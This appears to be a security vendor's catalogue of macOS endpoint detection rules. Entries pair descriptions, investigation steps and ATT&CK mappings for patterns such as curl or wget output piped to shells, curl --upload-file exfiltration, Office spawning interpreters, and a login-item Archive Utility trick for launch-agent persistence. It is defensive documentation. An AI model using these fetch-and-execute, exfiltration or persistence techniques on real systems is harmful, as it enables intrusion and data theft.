Mac Suspiscious Process

These detections identify suspicious activity from process start records collected by the Insight Agent from macOS endpoints.

Attacker Tools - Cobalt Strike Client Application - Mac

Description

This detection is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This detection is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

Attacker Tools - Cobalt Strike Client Update - Mac

Description

This detection is designed to detect the usage of the penetration testing/post-exploitation framework Cobalt Strike. This detection is specific to Mac operating systems.

Recommendation

Investigate the process events to identify if this activity is authorized and expected within the client network.

macOS Suspicious Process - chmod & nohup

Description

This detection identifies a chmod executing followed by a file being executed with nohup in the same command. This has been observed in macOS malware, notably the Schlayer malware, as a method of execution.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • File and Directory Permissions Modification - T1222
macOS Suspicious Process - Killall Terminal

Description

This detection identifies the killall command being used to kill any instances of the macOS Terminal that are running. This may be done to stop an earlier stage of the malware from continuing to execute, or as an anti-analysis technique.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Disable or Modify Tools - T1562.001
macOS Suspicious Process - Tail Piping to Funzip

Description

This detection identifies the 'tail -c' command being used to output a specified number of bytes from a file, followed by that output being typed to the 'funzip' utility to decompress the data. This has been observed in macOS malware that will hide a zipped binary file at the end of a bash script, use tail to output only the zip file from the script file, decompress the file, and execute it.

Recommendation

Investigate the file that the 'tail' command is being used on. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Deobfuscate/Decode Files or Information - T1140
Malicious Document - Microsoft Office for macOS spawns curl

Description

Crafted malicious documents targeting macOS have been observed using curl to download a second-stage payload from a remote server.

Additional information can be found at: https://labs.sentinelone.com/lazarus-apt-targets-mac-users-poisoned-word-document/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
  • Spearphishing Attachment - T1598.002
Malicious Document - Microsoft Office for macOS spawns Python

Description

This detection identifies Microsoft Office for macOS launching Python. Crafted malicious documents targeting macOS have been observed using Python to execute malicious code.

Recommendation

Examine the code passed to the Python process, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Spearphishing Attachment - T1598.002
Malicious Document - Word for macOS spawns perl

Description

This detection identifies Word spawning perl. This has been observed in use by malicious documents targeting macOS by attacker groups including Ocean Lotus (APT32)

Recommendation

Examine the commands being passed to Perl, and any process that Perl may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Malicious Document - Word for macOS spawns shell

Description

This detection identifies Word spawning sh, bash, or zsh. This has been observed in use by malicious documents targeting macOS by malicious groups including Ocean Lotus (APT32)

Recommendation

Determine what is being executed by the shell. Examine any processes spawned by Word. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Malicious Document - Word or Excel for macOS opens slk file

Description

.slk files are a symbolic link format that dates back to Microsoft DOS. They are still supported in Office products, and can be used by a malicious actor to deliver macros that will be opened by Microsoft Word or Excel.

Recommendation

Examine any processes launched by Word or Excel, and any process that those processes may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Spearphishing Attachment - T1598.002
Suspicious MacOS Process - launchd starts Archive Utility

Description

To bypass defenses around creating launch agents, malicious actor can create a login item that points to a zip file in the ~/Library containing a folder named LaunchAgents which contains a launch agent plist file. Since this is neither a script or an executable, the operating system allows it, and the archive will be opened using the default handler on login. The default macOS Archive Utility, which is trusted by the operating system, will open the archive and write the plist file contained in the archive to ~/Libary/LaunchAgents, which is normally not writable by unprivileged users or untrusted binaries. This will cause whatever is specified in the plist file to launch at next login.

Additional information can be found at https://objective-see.com/blog/blog_0x4B.html

Recommendation

Inspect the created plist file. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Launchctl - T1569.001
Suspicious Process - Curl Downloading From Cloudfront URL

Description

This detection identifies the 'curl' command being used to download data from a CloudFront URL. Malicious actors have been observed using 'curl' to download second stage payloads from CloudFront.

Recommendation

Investigate the contents of the CloudFront URL. Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Web Service - T1102
  • Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Bash

Description

This detection identifies output from the Curl utility being piped to bash or another shell process. Malicious actors may use Curl to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the shell process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Unix Shell - T1059.004
  • Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Perl

Description

This detection identifies output from the Curl utility being piped to Perl. Malicious actors may use Curl to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - Curl Output Piped to Python

Description

This detection identifies output from the Curl utility being piped to Python. Malicious actors may use Curl to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that Curl spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Python - T1059.006
  • Ingress Tool Transfer - T1105
Suspicious Process - curl --upload-file

Description

Malware has been observed using the curl --uploadfile command with no specified username to exfiltrate data to an attacker-controlled server.

This activity has specifically been identified in the CookieMiner malware for macOS: https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041
  • Exfiltration Over Web Service - T1567
Suspicious Process - Office for macOS Launching OSAScript

Description

This detection identifies Microsoft Office processes launching OSAScript. OSAScript is a command line utility for executing AppleScript, which attackers may use for malicious purposes.

Recommendation

Attempt to identify the document that caused this activity to occur. Investigate the contents of the AppleScript being run. Examine any processes that may have been launched by OSAScript. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • AppleScript - T1059.002
  • Spearphishing Attachment - T1566.001
Suspicious Process - Silver Sparrow Filenames

Description

This detection identifies filenames known to be used by the SilverSparrow malware for macOS.

More information can be found at https://redcanary.com/blog/clipping-silver-sparrows-wings/

Recommendation

Examine the parent process that spawned the process in question, and any process that it may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - Viewing macOS Quarantine Events

Description

This detection identifies SQL being used to read the contents of the macOS quarantine events database. Malicious programs have been observed doing this in order to view the URL they were downloaded from.

Recommendation

Examine the parent process that spawned the command, and anything else that process may have spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

Suspicious Process - WGet Output Piped to Bash

Description

This detection identifies output from the WGet utility being piped to bash or another shell process. Malicious actors may use WGet to download additional malware, and pipe that malware to bash for execution.

Recommendation

Investigate the URL that was downloaded from.Examine any additional processes spawned by the bash process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - Wget Output Piped to Perl

Description

This detection identifies output from the WGet utility being piped to Perl. Malicious actors may use WGet to download additional malware, and pipe that malware to Perl for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Perl process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105
Suspicious Process - WGet Output Piped to Python

Description

This detection identifies output from the WGet utility being piped to Python. Malicious actors may use WGet to download additional malware, and pipe that malware to Python for execution.

Recommendation

Investigate the URL that was downloaded from. Examine any additional processes spawned by the Python process that WGet spawned. If this activity is not benign or expected, consider rebuilding the host from a known, good source and having the user change their password.

MITRE ATT&CK Techniques

  • Ingress Tool Transfer - T1105